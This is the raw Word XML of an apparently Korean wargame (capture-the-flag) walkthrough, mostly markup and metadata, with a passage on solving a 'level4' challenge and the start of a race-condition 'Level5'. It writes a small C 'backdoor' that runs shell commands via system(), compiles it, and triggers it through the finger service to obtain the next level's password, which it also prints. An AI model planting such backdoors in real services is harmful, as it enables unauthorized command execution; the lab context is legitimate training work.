    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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따라서</w:t>
      </w:r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우리가 여기에 backdoor 프로그램을 만들어줘야 합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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vi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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backdoor.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-&gt;코드작성 -&gt; esc -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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&gt; :</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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의 순서로</w:t>
      </w:r>
      <w:r w:rsidR="00866573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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00430188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다음과</w:t>
      </w:r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같이 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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backdoor.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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코드를 작성합니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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#include&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart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int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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main()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="gramStart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system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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"id; my-pass;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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proofErr w:type="gramStart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return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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작성한</w:t>
      </w:r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다음에는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-o backdoor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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backdoor.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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명령어로 backdoor 프로그램을 만들어줍니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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430188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마지막으로</w:t>
      </w:r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finger level4@localhost 명령어를 실행하면 level5 password를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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얻게됩니다</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00430188" w:rsidRPr="00430188" w:rsidRDefault="00430188" w:rsidP="0043018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0F60EC" w:rsidRDefault="00430188" w:rsidP="0043018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  <w:r w:rsidRPr="00430188">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>원래</w:t>
      </w:r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외부에서 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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netcat으로</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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79</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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번포트에</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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접속해도 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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되야하는데</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 저는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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안되는군요</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00430188">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>. 이건 이유를 모르겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B5014" w:rsidRDefault="003B5014" w:rsidP="0043018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3B5014" w:rsidRDefault="003B5014" w:rsidP="0043018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3B5014" w:rsidRDefault="003B5014" w:rsidP="0043018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3B5014" w:rsidRDefault="003B5014" w:rsidP="0043018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p w:rsidR="00034983" w:rsidRPr="009A134E" w:rsidRDefault="002E52F9" w:rsidP="00034983">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00034983" w:rsidRPr="009A134E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 xml:space="preserve">evel5 </w:t>
      </w:r>
      <w:r w:rsidR="00034983" w:rsidRPr="009A134E">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00034983" w:rsidRPr="009A134E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>[레이스 컨디션]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B5014" w:rsidRDefault="00034983" w:rsidP="00430188">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B3C21">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>password :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B3C21">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00316566" w:rsidRPr="00316566">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>what is your name?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00316566" w:rsidRDefault="00316566" w:rsidP="00430188">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00316566" w:rsidRPr="00316566" w:rsidRDefault="00316566" w:rsidP="00430188">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕 Semilight" w:eastAsia="맑은 고딕 Semilight" w:hAnsi="맑은 고딕 Semilight" w:cs="맑은 고딕 Semilight"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00316566" w:rsidRPr="00316566" w:rsidSect="0090193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44A" w:rsidRDefault="00C5144A" w:rsidP="00C5144A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C5144A" w:rsidRDefault="00C5144A" w:rsidP="00C514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44A" w:rsidRDefault="00C5144A" w:rsidP="00C5144A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C5144A" w:rsidRDefault="00C5144A" w:rsidP="00C514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66B2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F84C05BA"/>
    <w:lvl w:ilvl="0" w:tplc="78CC94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4295"/>
    <w:rsid w:val="00001B43"/>
    <w:rsid w:val="00010BAD"/>
    <w:rsid w:val="000216C0"/>
    <w:rsid w:val="00034983"/>
    <w:rsid w:val="00041DF8"/>
    <w:rsid w:val="000426EB"/>
    <w:rsid w:val="000517E8"/>
    <w:rsid w:val="00052E7C"/>
    <w:rsid w:val="00064152"/>
    <w:rsid w:val="00082EA2"/>
    <w:rsid w:val="000A2F78"/>
    <w:rsid w:val="000C7007"/>
    <w:rsid w:val="000D1C97"/>
    <w:rsid w:val="000D3068"/>
    <w:rsid w:val="000F60EC"/>
    <w:rsid w:val="00116152"/>
    <w:rsid w:val="001252FE"/>
    <w:rsid w:val="00150825"/>
    <w:rsid w:val="0016550B"/>
    <w:rsid w:val="00183A08"/>
    <w:rsid w:val="001A21AC"/>
    <w:rsid w:val="001E07BC"/>
    <w:rsid w:val="001E674C"/>
    <w:rsid w:val="001F3CB0"/>
    <w:rsid w:val="001F3ED6"/>
    <w:rsid w:val="00223050"/>
    <w:rsid w:val="00286F0C"/>
    <w:rsid w:val="002924B8"/>
    <w:rsid w:val="002B7961"/>
    <w:rsid w:val="002E42C5"/>
    <w:rsid w:val="002E52F9"/>
    <w:rsid w:val="00310EBA"/>
    <w:rsid w:val="00316566"/>
    <w:rsid w:val="00337BEE"/>
    <w:rsid w:val="00373EA4"/>
    <w:rsid w:val="003A3FC9"/>
    <w:rsid w:val="003B5014"/>
    <w:rsid w:val="003D1104"/>
    <w:rsid w:val="003D4764"/>
    <w:rsid w:val="003F447A"/>
    <w:rsid w:val="003F4F57"/>
    <w:rsid w:val="00403EE0"/>
    <w:rsid w:val="0040417D"/>
    <w:rsid w:val="00416A69"/>
    <w:rsid w:val="00430188"/>
    <w:rsid w:val="00450749"/>
    <w:rsid w:val="00450A4F"/>
    <w:rsid w:val="00456B38"/>
    <w:rsid w:val="004707BD"/>
    <w:rsid w:val="004B59F0"/>
    <w:rsid w:val="004D4AB5"/>
    <w:rsid w:val="004F3468"/>
    <w:rsid w:val="00541BFD"/>
    <w:rsid w:val="00543CE4"/>
    <w:rsid w:val="00546E68"/>
    <w:rsid w:val="00556F43"/>
    <w:rsid w:val="00564C1B"/>
    <w:rsid w:val="00564DF5"/>
    <w:rsid w:val="005A6969"/>
    <w:rsid w:val="005B3C21"/>
    <w:rsid w:val="005E657D"/>
    <w:rsid w:val="006034A8"/>
    <w:rsid w:val="00633CFE"/>
    <w:rsid w:val="00634DA1"/>
    <w:rsid w:val="00634ED4"/>
    <w:rsid w:val="00640042"/>
    <w:rsid w:val="00645C86"/>
    <w:rsid w:val="00681687"/>
    <w:rsid w:val="00686326"/>
    <w:rsid w:val="006965C7"/>
    <w:rsid w:val="006D0D58"/>
    <w:rsid w:val="006F0AC6"/>
    <w:rsid w:val="006F5EA1"/>
    <w:rsid w:val="00703A66"/>
    <w:rsid w:val="00714295"/>
    <w:rsid w:val="00720566"/>
    <w:rsid w:val="007413E9"/>
    <w:rsid w:val="00741551"/>
    <w:rsid w:val="00752D57"/>
    <w:rsid w:val="007843C8"/>
    <w:rsid w:val="007B7029"/>
    <w:rsid w:val="007D0AAC"/>
    <w:rsid w:val="007D3AB8"/>
    <w:rsid w:val="007D7C8C"/>
    <w:rsid w:val="007E0F32"/>
    <w:rsid w:val="00857BC8"/>
    <w:rsid w:val="00866189"/>
    <w:rsid w:val="00866573"/>
    <w:rsid w:val="008C0DB1"/>
    <w:rsid w:val="008C2126"/>
    <w:rsid w:val="008D53B3"/>
    <w:rsid w:val="0090193C"/>
    <w:rsid w:val="00903DF4"/>
    <w:rsid w:val="00955F4F"/>
    <w:rsid w:val="00990EBC"/>
    <w:rsid w:val="00991FF2"/>
    <w:rsid w:val="009A134E"/>
    <w:rsid w:val="009D7A1D"/>
    <w:rsid w:val="009E6B1F"/>
    <w:rsid w:val="009F591E"/>
    <w:rsid w:val="00A04AF4"/>
    <w:rsid w:val="00A22286"/>
    <w:rsid w:val="00A25377"/>
    <w:rsid w:val="00A76008"/>
    <w:rsid w:val="00A94009"/>
    <w:rsid w:val="00AA4F21"/>
    <w:rsid w:val="00AA5087"/>
    <w:rsid w:val="00AA555D"/>
    <w:rsid w:val="00AB25DC"/>
    <w:rsid w:val="00AC209B"/>
    <w:rsid w:val="00AF17C9"/>
    <w:rsid w:val="00B246B3"/>
    <w:rsid w:val="00B27A1F"/>
    <w:rsid w:val="00B47D91"/>
    <w:rsid w:val="00B504B8"/>
    <w:rsid w:val="00B5376A"/>
    <w:rsid w:val="00B836A2"/>
    <w:rsid w:val="00B9209F"/>
    <w:rsid w:val="00BA2EEE"/>
    <w:rsid w:val="00BD466C"/>
    <w:rsid w:val="00BD6F9D"/>
    <w:rsid w:val="00BE400B"/>
    <w:rsid w:val="00BE4AE9"/>
    <w:rsid w:val="00BF3BB8"/>
    <w:rsid w:val="00C035A0"/>
    <w:rsid w:val="00C24ED0"/>
    <w:rsid w:val="00C256B9"/>
    <w:rsid w:val="00C5144A"/>
    <w:rsid w:val="00C53907"/>
    <w:rsid w:val="00C56C26"/>
    <w:rsid w:val="00C5737D"/>
    <w:rsid w:val="00C81389"/>
    <w:rsid w:val="00C95E02"/>
    <w:rsid w:val="00C97D69"/>
    <w:rsid w:val="00CC7F79"/>
    <w:rsid w:val="00CF0B38"/>
    <w:rsid w:val="00CF25F4"/>
    <w:rsid w:val="00D14EC3"/>
    <w:rsid w:val="00D21D86"/>
    <w:rsid w:val="00D25BCC"/>
    <w:rsid w:val="00D52D84"/>
    <w:rsid w:val="00D56EF9"/>
    <w:rsid w:val="00D804AC"/>
    <w:rsid w:val="00D963E1"/>
    <w:rsid w:val="00DA09E8"/>
    <w:rsid w:val="00DC2DE1"/>
    <w:rsid w:val="00DE2051"/>
    <w:rsid w:val="00E0218D"/>
    <w:rsid w:val="00E11EB5"/>
    <w:rsid w:val="00E376FE"/>
    <w:rsid w:val="00E61A99"/>
    <w:rsid w:val="00E70E0F"/>
    <w:rsid w:val="00E9739D"/>
    <w:rsid w:val="00EA5D23"/>
    <w:rsid w:val="00ED2CB5"/>
    <w:rsid w:val="00ED422C"/>
    <w:rsid w:val="00EE054C"/>
    <w:rsid w:val="00EE6280"/>
    <w:rsid w:val="00F612F8"/>
    <w:rsid w:val="00F726EE"/>
    <w:rsid w:val="00F80D9B"/>
    <w:rsid w:val="00F96273"/>
    <w:rsid w:val="00FA4FA9"/>
    <w:rsid w:val="00FD3E2C"/>
    <w:rsid w:val="00FD52F5"/>
    <w:rsid w:val="00FD5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93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F447A"/>
    <w:rPr>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="0000FF"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aaa2">
    <w:name w:val="aaa2"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="003F447A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="b1">
    <w:name w:val="b1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00556F43"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C5144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C5144A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C5144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C5144A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0040417D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AA508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A50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0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0873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76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7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5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002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95011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0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2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3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fe.naver.com/ArticleRead.nhn?clubid=27730275&amp;page=2&amp;menuid=26&amp;boardtype=L&amp;articleid=61&amp;referrerAllArticles=false" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cafe.naver.com/ArticleRead.nhn?clubid=27730275&amp;page=2&amp;menuid=26&amp;boardtype=L&amp;articleid=64&amp;referrerAllArticles=false" TargetMode="External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://cafe.naver.com/ArticleRead.nhn?clubid=27730275&amp;page=2&amp;menuid=26&amp;boardtype=L&amp;articleid=63&amp;referrerAllArticles=false" TargetMode="Externa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fe.naver.com/ArticleRead.nhn?clubid=27730275&amp;page=2&amp;menuid=26&amp;boardtype=L&amp;articleid=62&amp;referrerAllArticles=false" TargetMode="Externa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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" Target="activeX/activeX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2.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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BC540-4012-4557-AB41-FF3479E4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5</Pages>
  <Words>1692</Words>
  <Characters>9649</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>80</Lines>
  <Paragraphs>22</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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lis</dc:creator>
  <cp:lastModifiedBy>iblis</cp:lastModifiedBy>
  <cp:revision>124</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-01T10:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-01T12:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>